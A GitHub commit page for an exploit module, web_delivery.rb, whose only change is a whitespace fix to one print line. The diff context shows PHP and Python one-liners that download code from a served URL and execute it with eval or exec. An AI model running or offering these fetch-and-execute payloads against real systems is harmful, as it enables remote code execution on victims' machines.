Skip to content

Commit ffe77c4

Browse files
author
Swiftb0y
committed
fixed spacing
1 parent e51063a commit ffe77c4

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/exploits/multi/script/web_delivery.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -86,7 +86,7 @@ def primer
8686
when 'PHP'
8787
print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
8888
when 'Python'
89-
print_line("python 2:")
89+
print_line("python 2:")
9090
print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
9191
print_line("Python 3:")
9292
print_line("python3 -c \"import urllib.request; r = urllib.request.urlopen('#{url}'); exec(r.read());\"")

0 commit comments

Comments
 (0)